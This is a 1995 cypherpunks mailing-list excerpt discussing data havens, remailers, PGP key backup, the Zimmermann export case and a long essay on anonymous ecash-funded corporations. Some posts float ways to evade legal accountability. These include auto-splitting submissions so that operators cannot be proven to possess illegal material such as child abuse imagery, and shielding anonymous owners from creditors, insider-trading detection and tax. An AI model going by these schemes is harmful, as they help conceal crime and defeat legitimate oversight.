<5eP9Zc3w165w@dxm.ernet.in> tcmay at netcom.com (Timothy C. May) writes: > > rishab at dxm.ernet.in says: > > > WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter > > > member of the cypherpunks - a term that she coined." I didn't even know t > > > _was_ a charter. > > > > Or a Jude Milhon, for that matter. Another example of the continuing > > decay of a once proud magazine... > > I'm not sure what Perry's not having heard of Jude Milhon is supposed > to mean, or how "Wired" interviewing her is "another example of the > continuing decay," etc. I suppose I should have elaborated in my original post. Of course I know of Jude's role in cypherpunk history; in fact I thought it would interest cpunks to know that she was interviewed. As for the 'charter' - it was no doubt WIRED's creative interpretation. > She's not presently subscribed and hence can't speak up in this > strange matter of how an interview with her implies a magazine is in > decay. Speaking of which, the list membership has hit 640. I'll be posting a membership profile soon, since it's a year since I saw the one that got me out of 'lurk mode' when I discovered I was the only cpunk in this region. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From grendel at netaxs.com Tue Jan 17 15:42:33 1995 From: grendel at netaxs.com (Michael Handler) Date: Tue, 17 Jan 95 15:42:33 PST Subject: Another problem w/Data Havens... In-Reply-To: <9501170829.AA10034@anchor.ho.att.com> Message-ID: On Tue, 17 Jan 1995 wcs at anchor.ho.att.com wrote: > The former case is easy, > if you can rent computer space in a country with a non-meddling > government and good net access (or an easily rentable government :-).) > For those of us in the latter situation, the discussion's still > useful... Point taken. > However, at receipt of the data, it's all in one place, Dave's inbox. > If Alice encrypted it safely, or secret-shared it herself, great! > But if Alice is a narc trying to entrap Dave with plaintext ThoughtCrime, > or Alice's key has been compromised, anything in Dave's inbox is > still toast, even if anything that's been split and stored is safer > than if it had been stored unsplit. So he either needs to split it fast, > shortening the window, or find a way to blind his mail before processing it, > or split it before reading it. I could write a procmail recipe and a script in about an hour to automatically secret-share-split and redistribute the incoming submission. If the authorities attempt to indict you for possessing illegal information / kiddie porn / whatnot, they have to prove that you interfered with the automatic redistribution process and examined the contents of the submission. If you in fact did not look at the submission, they would have a difficult time doing so. -- Michael Handler Civil Liberty Through Complex Mathematics Philadelphia, PA PGP Key ID FC031321 Print: 9B DB 9A B0 1B 0D 56 DA 61 6A 57 AD B2 4C 7B AF "Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme From pstemari at erinet.com Tue Jan 17 15:54:19 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Tue, 17 Jan 95 15:54:19 PST Subject: Abuse and Remailer Ethics Message-ID: <9501172343.AB11989@eri.erinet.com> At 10:27 PM 1/16/95 -0500, Jonathan Rochkind wrote: > ... So I'm tempted to say "tough luck" to newsgroups that >don't like receiving anonymous posts. The alternative is for people >interested to create a moderated newsgroup, where of course the moderator >could refuse to allow anonymosu posts with or without the remailer >operators cooperation. ... Another, and less onerous alternative, is to simply stick encrypted reply-to blocks on messages to newsgroups. At that point there's no real difference between the anon post and a post from a system that doesn't provide real name<->userid mappings, and the flames can go straight from the newsgroup to the instigator without involving the remailer op. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From pstemari at erinet.com Tue Jan 17 16:04:13 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Tue, 17 Jan 95 16:04:13 PST Subject: Does encrypted equal safe? Message-ID: <9501172355.AA12246@eri.erinet.com> At 01:28 PM 1/17/95 -0800, Eric Hughes wrote: > ... Meaning is subjective. If I see encrypted text, am I to be held >responsible for having seen through an encryption for which I hold not >the key? Merely because someone knows a transformation into a >disapproved form does not mean that I do. ... Which is exactly why the encrypt on receipt or decrypt on delivery ideas won't work. You have to be provably ignorant of the data. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From Ben.Goren at asu.edu Tue Jan 17 16:05:30 1995 From: Ben.Goren at asu.edu (Ben.Goren at asu.edu) Date: Tue, 17 Jan 95 16:05:30 PST Subject: Another problem w/Data Havens... Message-ID: At 4:43 PM 1/17/95, Paul J. Ste. Marie wrote: >At 03:29 AM 1/17/95 EST, bill.stewart at pleasantonca.ncr.com +1-510-484-6204 >wrote: >> ... That way, Dave's system really only has knowledge of the headers, >>plus one line at a time of incriminating data on the fly. ... > >I don't see exactly what that is buying Dave. The entire contents were >still transmitted to him, so the ability to see the entire file was still >present, which means he could have, had he chosen to do so, prevented the >file from residing on his system, and could have screened it. It's >essentially only the word of the haven op that shows he didn't examine the >entire file. That's the main reason why I like my idea of having a trusted encryptor. Nobody's suggested that the current timestamp operators would be in Deep Doo-Doo if they timestampped some piece of thoughtcrime; why should somebody who encrypts be any different? The service could even be advertised as a different form of timestamping (or notarizing). Not only do you get the file back signed, but you get it back encrypted and signed. > --Paul J. Ste. Marie > pstemari at well.sf.ca.us, pstemari at erinet.com b& -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059. From sandfort at crl.com Tue Jan 17 16:57:01 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Tue, 17 Jan 95 16:57:01 PST Subject: Does encrypted equal safe? In-Reply-To: <9501172355.AA12246@eri.erinet.com> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, > ... > Which is exactly why the encrypt on receipt or decrypt on delivery ideas > won't work. You have to be provably ignorant of the data. In my law school they taught that the burden of proof in a criminal case was on the government. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From rrothenb at libws4.ic.sunysb.edu Tue Jan 17 17:03:52 1995 From: rrothenb at libws4.ic.sunysb.edu (Robert Rothenberg) Date: Tue, 17 Jan 95 17:03:52 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: <9501180103.AA16543@toad.com> Ben.Goren at asu.edu wrote: > Doo-Doo if they timestampped some piece of thoughtcrime; why should > somebody who encrypts be any different? > > The service could even be advertised as a different form of timestamping > (or notarizing). Not only do you get the file back signed, but you get it > back encrypted and signed. > Hmmm.... Of course in some cases one may not want the file to be returned with a signature and timestamp (might be incriminating evidence, depending on what one wants stored and the overall political situation where one is, etc....). Of course that does sound useful. > > -- > Ben.Goren at asu.edu, Arizona State University School of Music > Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059. > Rob Finger for public key From Ben.Goren at asu.edu Tue Jan 17 18:21:28 1995 From: Ben.Goren at asu.edu (Ben.Goren at asu.edu) Date: Tue, 17 Jan 95 18:21:28 PST Subject: Another problem w/Data Havens... Message-ID: At 6:03 PM 1/17/95, Robert Rothenberg wrote: >> Doo-Doo if they timestampped some piece of thoughtcrime; why should >> somebody who encrypts be any different? >> >> The service could even be advertised as a different form of timestamping >> (or notarizing). Not only do you get the file back signed, but you get it >> back encrypted and signed. > >Hmmm.... Of course in some cases one may not want the file to be returned >with a signature and timestamp (might be incriminating evidence, depending >on what one wants stored and the overall political situation where one is, >etc....). Of course that does sound useful. Just as a notary public does not certify that a given document is truth, but rather that it is what it is and the signature belongs to the person who it appears to belong to, a public timestamp/notary/encryption service on the 'net would certify the existence of that document in that form at that time. No more, no less. If I recall correctly, a notary can certify a sealed envelope without knowing its contents, by putting a tamper-proof seal on it. Sound familiar? I'll try to find a notary to see if that's the case. If so, we're got as good a precedent as we'll ever find for just about anything. >Rob Finger for public key b& -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059. From homer at math.cornell.edu Tue Jan 17 18:25:10 1995 From: homer at math.cornell.edu (Homer Wilson Smith) Date: Tue, 17 Jan 95 18:25:10 PST Subject: Abuse and Remailer Ethics In-Reply-To: <9501172343.AB11989@eri.erinet.com> Message-ID: This will only work if ALL posts have anonymous reply blocks added, or if the posting only goes through one remailer, as there is no way the first on the chain can know that the end destination is a listserv, no? Homer On Tue, 17 Jan 1995, Paul J. Ste. Marie wrote: > At 10:27 PM 1/16/95 -0500, Jonathan Rochkind wrote: > > ... So I'm tempted to say "tough luck" to newsgroups that > >don't like receiving anonymous posts. The alternative is for people > >interested to create a moderated newsgroup, where of course the moderator > >could refuse to allow anonymosu posts with or without the remailer > >operators cooperation. ... > > Another, and less onerous alternative, is to simply stick encrypted reply-to > blocks on messages to newsgroups. At that point there's no real difference > between the anon post and a post from a system that doesn't provide real > name<->userid mappings, and the flames can go straight from the newsgroup to > the instigator without involving the remailer op. > > > --Paul J. Ste. Marie > pstemari at well.sf.ca.us, pstemari at erinet.com > > From homer at math.cornell.edu Tue Jan 17 18:35:45 1995 From: homer at math.cornell.edu (Homer Wilson Smith) Date: Tue, 17 Jan 95 18:35:45 PST Subject: Abuse and Remailer Ethics In-Reply-To: <9501172032.AA29703@cfdevx1.lehman.com> Message-ID: The POINT is that if you chain and use pgp the remailer operator CAN'T sell you out. Whether or not the reop discusses or promises never to sell you out is meaningless when the cards are down. Trusting someone because they SAY they are trustable is a fools game. So up front, I say "Who me, trustable? Hah!", and then let people use the technology to make sure their stuff is safe. PGP can't be broken, and chaining can't be traced without LOTS of difficulty, and frankly reops have little interest really in reading people's private mail, especially when it is pgp'd, let alone tracing them for postings that they don't even know what's being said in them! Right? Homer On Tue, 17 Jan 1995, Rick Busdiecker wrote: > Date: Tue, 17 Jan 1995 11:06:16 +0100 (MET) > From: Mats Bergstrom > > This thread illustrates (at least if setup's like this are > worthy of a place in Raph's list) that penet.fi is the safest > way to go for the moment. > > That depends on your threat model. For most, chaining is safer than > penet. > > I would just hate it to have my head on the plate of a remailer > operator who takes an interest in subtile ethical discussion of > whether to sell me out or not. > > Your characterization of what Homer has said strikes me as extremely > inaccurate. > > Rick > > From stig at hackvan.com Tue Jan 17 19:43:06 1995 From: stig at hackvan.com (Stig) Date: Tue, 17 Jan 95 19:43:06 PST Subject: How do I know if its encrypted? In-Reply-To: Message-ID: Eric Hughes wrote: > > I'll tell you one really useful facility for offsite storage, and > that's private key backup. Use a secret sharing arrangement, say 5 > out of 7 reconstruction, and send out 7 chunks. Now, give a different > pointer-to-chunk to each of 7 different people. In the case of > catastrophe, you can recover your key. > I'll second Eric on the utility of this practice. I should've done this... I lost a new pgp key when my hard disk hit the fan last month. I can't even revoke it... Stig FYI: The key to ignore is 0x31F61BA9. The new key is on a server near you. Key for user ID: Stig 1024-bit key, Key ID 6202A715, created 1995/01/03 Key fingerprint = 58 0C 16 D5 CD 27 EE 37 BB EC 47 73 36 12 9B 96 From rseymour at reed.edu Tue Jan 17 19:49:47 1995 From: rseymour at reed.edu (Robert Seymour) Date: Tue, 17 Jan 95 19:49:47 PST Subject: Known data havens for pirates? Doubtful In-Reply-To: Message-ID: In the world according to rishab at dxm.ernet.in: > I forget who wrote: > > blame them. Copyrighted data on a server in a jurisdiction that > > doesn't acknowledege the copyrights - a prime use for Data Havens > > when they come of age. > I suppose you _are_ aware that the US has threatened China with punitive > duties on $100 BILLION dollars worth of trade, and that China has started > holding some show trials (without shutting down its state-owned CD-piracy > factories). It's not going to be easy to find a country more willing and > able to ignore international copyright law (Berne Convention etc) than China; > however, despite howls of protest even China is likely to knuckle down > eventually. What may be likely is distributed piracy markets, such as > described in Tim's BlackNet spoof. One of the major features of the Uraguay round of the GATT (General Agreement on Tariffs and Trade) is a large revision of internation patent and copyright law (which is currently de facto non-existent in many countries). Intellectual copyrights are still somewhat vague in the current agreement, but there will be a course for hearing through the WTO (World Trade Organization). In the case of Asian countries, APEC (Asian Pacific Economic Conference) is laying out intellectual property right regulations for conference members (the US, Canada, and most of the Pacific Rim including China). Though these agreements are still a long way from clearing up copyright disputes and their enforcement remains dubious, they should help to stop such blatant infractions of copyright status. Of course, one need not look to China for copyright violations, just take a look at all the video tape pirates in New York or other cities ... |Robert -- Robert Seymour rseymour at reed.edu Reed College Artificial Life Project NeXTmail, MIME, PGP accepted WWW Pages From dcwill at ee.unr.edu Tue Jan 17 21:56:41 1995 From: dcwill at ee.unr.edu (Dr. D.C. Williams) Date: Tue, 17 Jan 95 21:56:41 PST Subject: Key backup (was: How do I know . ..) Message-ID: <199501180601.BAA16566@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- 'Stig' was reported to have written: > Eric Hughes wrote: > > > > pointer-to-chunk to each of 7 different people. In the case of > > catastrophe, you can recover your key. > > > I'll second Eric on the utility of this practice. I should've done this... > I lost a new pgp key when my hard disk hit the fan last month. I can't even > revoke it... The "spread spectrum" approach might well be indicated for some life-or- death key security matters, but the vast majority of PGP users probably don't need or want to play Spy vs. Spy with their friends to backup keys. There must be a more reasonable way to backup non-critical keys. Magnetic media is much more reliable than it used to be, and less reliable than it will soon be, but it's still vulnerable to phenomena such as EMP. Friends are vulnerable to death and disagreements which may end their willingness to participate in the reconstruction of your key. I recognize that you can't just leave your private keyring lying around indiscriminately (especially if it's labeled "PGP private keyring"), but what's to prevent it from being reproduced in some kind of hard copy form (barcode? ASCII?) on some durable stock (credit card plastic?) and tucked away someplace especially safe? A credit card (postage stamp?) sized flat item is pretty easy to hide, especially if it's real function isn't obvious. I guarantee you that I can hide such an object in my home, tell you it's here somewhere, and watch you die of old age before you and a small armada of your henchmen can find it. If it's still "passphrase-protected", an attacker would a) have to know what to look for, b) have to find it, and c) obtain the passphrase. A "brute force" physical attack (ie: machine seizure and thumbscrews) or TEMPEST-based attack would, IMO, be less effort on the part of the attacker and is therefore the practical limit on private keyring security. Explanations as to why this would be a Bad Idea are actively solicited. =D.C. Williams - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxyupioZzwIn1bdtAQErMgGAnlr/g/eLesvcCh9IdXy7RzH2vkKbC/x7 pbm/OA+W7z15ix0PzHOZ/vwpg9X5JBku =TRHd -----END PGP SIGNATURE----- From hfinney at shell.portal.com Tue Jan 17 21:57:08 1995 From: hfinney at shell.portal.com (Hal) Date: Tue, 17 Jan 95 21:57:08 PST Subject: EE Times on PRZ Message-ID: <199501180556.VAA25844@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- The Jan 16 issue of EE Times has an excellent article on the legal controversy surrounding Phil Zimmermann and PGP, positioned top-right front-cover for maximal exposure. It describes the aftermath of a meeting last week between Phil's attorney, Philip Dubois, and the government lawyer handling the case. "'We told the prosecutor our concerns,' Dubois said. 'He agreed to consider them. We might hear back in a month or two. He didn't make any promises.'" (Sometimes it seems like the gov't is dragging this case out intentionally. I believe the uncertainty does have a chilling effect on private development of strong crypto, which would be gone if the government announced it was not going to pursue the case, or if they did bring charges and lost.) Another interesting quote: "Zimmermann is not in danger of being indicted for willfully exporting PGP. Rather, the U.S. attorney's office, here, is considering charging him for making PGP available in such a manner that it could be exported by a third party." What the hell is this? Can anyone point to the statute they may be referring to here? This seems awfully broad. This, from a sidebar, is really surprising: "In contrast, public keys allow the overt publication of an encryption key, because decryption keys can only be derived through a mathematically difficult process, such as large prime-number factoring. Contrary to popular belief, the NSA can decrypt public keys of most practical key sizes." I wonder what this means? If it is a claim that the NSA can factor 1024 bit moduli that would certainly come as a big surprise. If they are saying that they can do 512 bits that would be more believable although of interest. It is strange that the author would include a statement like this without attribution or evidence. Generally, the article is very favorable towards Phil and an excellent overview of the case. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLxytnBnMLJtOy9MBAQHGnAH/TAOr6TNchZjCyMESeDdOf1seXTkfMbMY 3qrL91OmjwxDIBDkzszrgizwadKwWYn65yOY3yJ4Wk/xUcNwKFnk1Q== =PoYj -----END PGP SIGNATURE----- From davidm at iconz.co.nz Tue Jan 17 22:06:49 1995 From: davidm at iconz.co.nz (David Murray) Date: Tue, 17 Jan 95 22:06:49 PST Subject: Anonymous corporations (a work in progress...) Message-ID: <199501180604.TAA02052@iconz.co.nz> 0. Introduction It's been a lucrative month, ecash-wise, what with consulting for some anonymous Mafia don, selling those kiddieporn mpegs and killing that guy who cut Tim May off in the parking lot at the mall. So lucrative, in fact, you don't want those digidollars just sitting around on your hard drive -- you want them to be earning you something. The answer, of course, is to invest them in an anonymous corporation. 1. The structure of anonymous corporations 1.1 Outline An anonymous corporation provides an intersection between the real [a term used throughout purely in order to deconstruct it] and digital worlds, a point of contact between the e-economy and the real one. The corporation itself is known: a genuine Delaware/Bahamas/Cayman Islands etc corporation, able to own property, to make contracts, to sue (and be sued) in the courts and with all the normal rights (and liabilities) of the (corporate) citizen. But the (controlling) investors in the corporation (basically, the stockholders) are anonymous. The investment comes in from the stockholders in the form of ecash, and is transformed by the company into real money and investments. Because the investors are anonymous and (assuming) the ecash is untraceable, truly anonymous control of real assets can be exercised. 1.2 Legal structure The structure has two parts: a corporation and a trustee. The corporation is just a normal corporation with directors typically supplied by the trustee company that administers the corporation. [Note: the trustee company will need assurance that its fees will be paid, and that its directors are sufficiently indemnified. See below for discussion on whether this is possible under an anonymous structure.] The corporation issues shares to the trustee. The trustee (typically a trustee company - but a different one to that administering the company) holds the shares on trust for the anonymous beneficiaries. A beneficiary is defined as a person who, for the time being, holds an eshare in the trust. Each eshare gives the holder the right to direct the trustee on how to vote one of the trustee's shares, the right to receive the dividend income of one of the trustee's shares, the right to receive any distribution due to one of the trustee's shares (eg on the dissolution of the corporation), and the right to participate in the enforcement of duties owed to stockholders. That is, each eshare in the trust mirrors a share in the corporation. The two part structure isolates the anonymity from the vagaries of corporate law: the register of stockholders of the company will truthfully show the Completely Legitimate Perpetual Trustee Company, Inc (or whatever). It also deals with the classic corporate agency problem (the separation of ownership and control) by allowing the anonymous e-stockholders to enforce their rights against (ie sue) the corporation or its management without breaking cover -- the trustee is bound by its deed to take the necessary action at the (reasonable) behest of the anonymous e-stockholders. The agency situation is not ideal. Particularly with regard to ensuring that the *trustee* performs (including the possibility of collusion between directors and trustee), matters of reputation (including the possibility that an e-stockholder is a competitor or a testing agency) will be relevant. (And, of course, there is the possibility that one or more of the e-stockholders is in turn an anonymous corporation, with full rights to sue, and no problem with being unmasked.) Agency problems can be minimised by restricting the operations of the corporation. Where the corporation merely holds units in a mutual fund, or a piece of real estate, or perhaps even shares in another corporation, the directors duties will be minimal -- the corporation acting as a conduit only. When the anonymous corporation is undertaking a real business, when management has to be hands on and day to day (ie when there is a greater disparity of information between management and owners) the chances of default by management is probably much greater. Structures could be developed to manage this risk. Note that the anonymous corporation can have any number of e-stockholders, from one upwards. 1.3 Technical requirements The establishment of an anonymous corporation has a number of cryptographic requirements: a) The ready availability of untraceable ecash able to be transformed into real money. This could involve a scheme whereby the ebank was unable to know which edollars had been issued to which customer, followed by anonymous transfer of edollars (ie the bank doesn't know the identity of the transferor or the transferee). That is, some flavor of Chaumian system where double spending is eliminated by on-line settlement of transfers. The ebank would redeem ecash for real dollars. [This, of course, is more of a systemic than a cryptographic requirement.] b) A method for the anonymous issue/subscription of eshares. c) A method for the anonymous transfer of eshares (with protections against 'double spending'). These two requirements are essentially a variation on the ecash scheme above. d) A method for secondary market purchasers of eshares to verify which company the eshare belongs to. e) A method for the holders of eshares to vote anonymously. f) A method for distributing dividends etc to e-stockholders. Perhaps the trustee publicly posts an encrypted message. Each eshare acts as a key to decrypt one part of the message, revealing ecash (or, in the case of a bonus issue of stock, or a stock split, or even a merger, eshares etc). If an e-stockholder has more than one share, they will be able to decrypt more than one part (ie each part of the message corresponds to one eshare). In the case of a widely held corporation, information (accounts, voting forms etc) can be distributed publicly. In the case of closely held corporations (where stockholders are more intimately concerned with management) sensitive information could be encrypted for each e-stockholder. In order to provide maximum flexibility, an anonymous corporation should be able to issue many millions of eshares. Similarly, an e-stockholder should ideally be able to hold many millions of eshares. 2. Implications 2.1 Implications for the structure The key (no pun intended) feature of anonymous corporations is, of course, that the stockholders (in the beneficial/equitable sense, ie the e-stockholders) are not known, and cannot be sued. In so far as corporations generally provide limited liability to stockholders anyway, this is not too radical a change (and may deflect some criticism). However, it does have some repercussions. a) The anonymity of stockholders will deter creditors. One of the protections that creditors of a corporation have is that if the corporation is unable to pay them, but it has made a payment to the stockholders, the creditors can recover the money paid to the stockholders as a fraudulent conveyance (or similar). With an anonymous corporation, once a payment has been made to stockholders, it is unrecoverable. In order to encourage lenders to extend credit, the corporation could offer to secure the loan (with traceable property [ie if the corporation doesn't pay, and deals with the property, the lender can find the property, take it, and sell it to cover the unpaid debt], or by pledge [the corporation leaves the property with the lender, so if the debt isn't paid the lender can sell the property without having to trace it first]). Alternatively, the income stream of the company could be encumbered in such a way that creditors had to be paid out before stockholders. In general, many of the techniques of project financing will be relevant to attracting debt finance. Trade creditors, especially the directors and the trustee, will also require comfort that their bills will be paid and any liability covered. Some combination of up front payments, insurance and recourse to the assets of the corporation may be enough. b) The anonymity of stockholders will affect other stockholders Stockholders sometimes owe duties to other stockholders. In so far as these duties extend to e-stockholders (who hold the equitable, but not the legal title to the shares) they will be effectively unenforceable [except for the possibility of injunctive relief...]. Thus majorities may have more freedom in dealing with minorities [in some situations], possibly leading to a higher premium for control, and insider trading will be undetectable, leading to a more accurate market price for the e-stock (and all other stock). c) The anonymity of shareholders may be prejudicial A number of regulatory tests depend upon the identity of (beneficial) shareholders, for example tests of foreign control in investment and tax laws. Anonymous companies may find that the onus is on them to prove that they do not fall into an undesirable category. This will, typically, be impossible. d) The complexity of the structure has a significant cost As compared with directly owning an asset, owning an asset via an anonymous corporation is incredibly costly. There are two layers of fees (to directors and to the trustee) and possibly even two layers of tax (at corporation and trust levels) to pay on any income, quite apart from the set up costs and the administration of the technical/cryptographic structure. Then there is the cost in time and effort of monitoring the structure to see that nothing is going wrong (the agency cost). And, of course, e-shares are also likely to be significantly less liquid than ecash or the assets held by the corporation. And the risk of holding assets via such a structure (default by directors or trustee, discovery by traffic analysis, government confiscation of all anonymous corporations) must be weighed against the risk/return involved in, on the one hand, transforming the ecash into real cash oneself, and, on the other, burying a [heavily encrypted] floppy disk in a coffee tin in the back yard. 2.2 Implications for the e-economy a) Eregistries Some elements of the anonymous corporation could be shared across instances, such as directors, trustee and technical/cryptographic structure. This would help to reduce costs (including set-up costs) somewhat. And by separating the cypherpunkish element (crypto-struct) from the more general, and already existing, elements (ie trust companies), it may assist in selling the idea to those pre-existing elements and the investing public [private?]. In other words, just as some corporations use outside services to administer their share registers, eregistries would handle the mechanics of eshares. Eregistries would make the investment in equipment and bandwidth, and charge the issuers of eshares (the trustee) a fee for handling the issue, the online settlement of transfers, the distribution of dividends etc. Not only does this spread the cost of equipment among corporations, but, if standard service packages are offered by the eregistries, greatly simplifies the drafting of trust deeds [there is only a need to refer to "the services of Cypherpunk eRegistry No1 BV", rather than scary maths]. Such eregistries would need a reputation for reliability, honesty and (perhaps) regulatory inaccessibility. [They might also provide an extra layer of anonymity, acting as a sort of mixer for transactions -- was that message a subscription to that corporation, a transfer of an eshare in this one, or a vote on some matter for the other?] And they need not, of course, be limited to eshares -- eregistries could provide clearing for edebt and ecash. b) Secured lending -- extending credit to anonyms Because eshares represent something real, they have real value. A creditor, therefore, should be prepared to lend emoney even to a digital pseudonym on the security of a pledge of eshares [ie eshares transferred to lender on condition that they be transferred back on repayment of loan]. (Another way of leveraging the value of your eportfolio is simply to have your anonymous corporation borrow the money: capitalise up a corporation, have the corporation buy an asset, and have the corporation borrow real money secured on that asset -- the corporation can spend the money or pay it to the e-stockholder (you) as a dividend...) Enabling anonymous credit unlocks more of the value of ecash. c) Why not edebt -- ecash by another name As you will have noticed, I have made certain assumptions about how ecash works [although these assumptions are probably not necessary for the functioning of anonymous corporations]. It is time to make those assumptions more explicit. I see a system whereby the average person buys ecash over the net (or even off the street), say using their credit card. In return for a (cleared) payment the ebank issues a bucket-o-bits, representing that cash (minus a fee?). The ebank (via its eregistry) does not know which digital-dollars go to which non-anonymous customer. Transfers of ecash take place anonymously on line (old buckets revoked, new buckets issued). What gives the ecash value is the ebank's promise to turn each edollar into a real dollar (minus a fee?) when presented for payment. This promise is made credible by the ebank's credit rating -- either because it is a bank/financial institution itself, or because it invests the original payments in some very secure instrument (eg t-bills). Ecash, in other words, is just an AA(A) rated no interest debt security issued at face value. [Of course corporations, anonymous and otherwise, could issue other types of edebt -- zero coupon, interest bearing, even convertible into eshares...] This, unfortunately, raises expensive regulatory hurdles for ebanks. Offers of securities to the public of the US (whether by a domestic or foreign ebank) would seem to require compliance with the Securities Act 1933, the Securities Exchange Act 1934, the various requirements of the SEC, and probably state investment laws. As well as the costs of mandated ongoing disclosure, and the setup costs of such a scheme (accountants, investment banks, Wall St lawyers), there are the problems of having to appoint a US indenture trustee (yet another body to convince of the merits of the scheme...) and produce an SEC approved prospectus (anyone for wading through 300 Web pages?). But, of course, these hurdles must be overcome (or bypassed, or even, perhaps, simply ignored) for an anonymous e-economy that is fully integrated into the real economy to develop. Quite apart from the regulations, ebanks structured in this way must face certain facts of economic life. A stand-alone ebank (ie one which is not already a bank or other financial institution) will face not only regulatory costs and technical costs (eg eregistries) but also the cost of dealing with the real financial system -- it will cost money to get money from investors (transfer from their account to yours), and to return money to investors (transfer from your account to theirs). To offset these costs, ebanks will receive interest income and fee income. The interest income will be minimal. By definition the assets of the bank will be low risk, and therefore low return. It is also likely that the bulk of the ecash will be outstanding for a relatively short time (see the mpeg you want, buy the ecash, buy the mpeg; the seller receives the ecash and converts it, or invests it in an anonymous corporation who converts it), perhaps only overnight. And fees will discourage the use of ecash. The higher the fees, the less the prospect of anonymity will appeal to the person on the street (or is that the person on the information superhighway?). A certain amount of legitimate use would do wonders to smooth the path of the crypteconomy. It is just too easy to ban (or anathematise) the whole system if *every* edollar comes from the four horsemen of the cryptocalypse. 2.3 Implications for the real economy a) Response of regulatory authorities The wholesale interpenetration of the real and digital economies that anonymous corporations (and similar structures) allow provides a mechanism whereby the ability of the state to control individuals is lessened. As edollars control real assets, edollars too become real, and the anonymous e-economy and the real economy merge. [Or, perhaps, since the real economy will be bigger than the e-economy, the former *absorbs* the latter.] And once this merger has taken place, it will be too late for the state to act. The state then, will tend to fear loss of control, and, as a distinct subset of that, loss of revenue through wholesale tax avoidance. The tax problem is probably the easiest to solve. Instead of taxing the recipients of income, the sources of that income can be taxed (eg withholding taxes on dividends and e-dividends), and the ultimate expenditure of that income can be taxed (consumption taxes). This may seem like a big change, but in the history of taxation (which is just the history of bullying) a universal income tax is very recent. And the change is, after all, just one of emphasis. The general response of the state (egged on by the establishment) to the prospect of waning control has been discussed at length by this group, as has the difficulty of operating in the financial products marketplace. I merely mention the possibility that the SEC will refuse any scheme that seeks to issue readily convertible anonymous securities, on the grounds that it will make the detection of securities offences (such as insider trading and stock parking and a million other technical evils) too difficult. 3 Where to from here? Cypherpunks write code. It would be nice to develop the bank-in-a-box that led to a thousand guerilla ebanks springing up around the world (like so many points of light in a presidential speech). It may not be that easy. But the legal and financial systems are still systems, and they can be hacked (although they tend to fight back -- forensic black ice...). Demonstrate the structures that make ecash a useful tool for solving real world problems (like having to pay tax, or signalling one's moves to the market), and the crypto-meme could spread to the arch-hackers of Wall St. And evolving a modest ebank/anon-corp structure ('International Postage, Inc'?) might be a way to sneak under the wire of the regulators: no need to look too hard at some hobby project of a bunch of propellor heads, after all. Some home cooked legal documents, a bit of form filling and Hey Presto -- real money to keep remailers and start data havens really going. And when we launch the first CyP anonMutual Fund... Anyway, I'll wait for the feedback and see if it's worth (in the moral/political sense) looking at this stuff further. The box the bank comes in might be filled with forms. [BTW -- TINLA] From rogaski at phobos.lib.iup.edu Tue Jan 17 22:23:59 1995 From: rogaski at phobos.lib.iup.edu (Mark Rogaski) Date: Tue, 17 Jan 95 22:23:59 PST Subject: EE Times on PRZ In-Reply-To: <199501180556.VAA25844@jobe.shell.portal.com> Message-ID: <199501180623.BAA02464@phobos.lib.iup.edu> -----BEGIN PGP SIGNED MESSAGE----- - From the node of Hal: : : Another interesting quote: "Zimmermann is not in danger of being indicted : for willfully exporting PGP. Rather, the U.S. attorney's office, here, is : considering charging him for making PGP available in such a manner that : it could be exported by a third party." What the hell is this? Can : anyone point to the statute they may be referring to here? This seems : awfully broad. : In a related story: The U.S. attourney's office is also considering charging GM, Ford, and Chrysler for making automobiles available in such a manner that people could run someone over and leave the scene of the accident. :) - ----- Doc doc at phobos.lib.iup.edu aka Mark Rogaski http://www.lib.iup.edu/~rogaski/ Disclaimer: You would probably be hard-pressed to find ANYONE who agrees with me, much less my university or employer... [finger fllevta at oak.grove.iup.edu for PGP Public Key and Geek Code v2.1] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxyzuh0c4/pqJauBAQEDtQP9FBsK/nzSgr4D4B/WjhYJRMlc43B4T0Cp eSxmp+r/xN2yYkvnJS7hTnqRXKR6BO/cWYHxaoiiZ9yfF+duDxpnIOAUfu9k8+OG EBJErsLRKi1x/V9JK8hbK+Qcj/+LU6vrNKPAyQ/8cDdLt+Pz0tdCeKhtKcQ9n9jb WGvbzybIOBs= =Bfj7 -----END PGP SIGNATURE----- From shamrock at netcom.com Tue Jan 17 23:24:16 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 17 Jan 95 23:24:16 PST Subject: remailer security Message-ID: -----BEGIN PGP SIGNED MESSAGE----- At 8:50 PM 1/17/95, Mats Bergstrom wrote: >There are ways of >multiple chaining for the lazy, though: C2 lets you pick the chained >sites by clicking on a web-page (but does it encrypt??). No it doesn't. Which dramatically reduces its usefullnes. There should be some way to add encryption envelopes to the CGI script. Premail? - --Lucky -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Not-the-Real 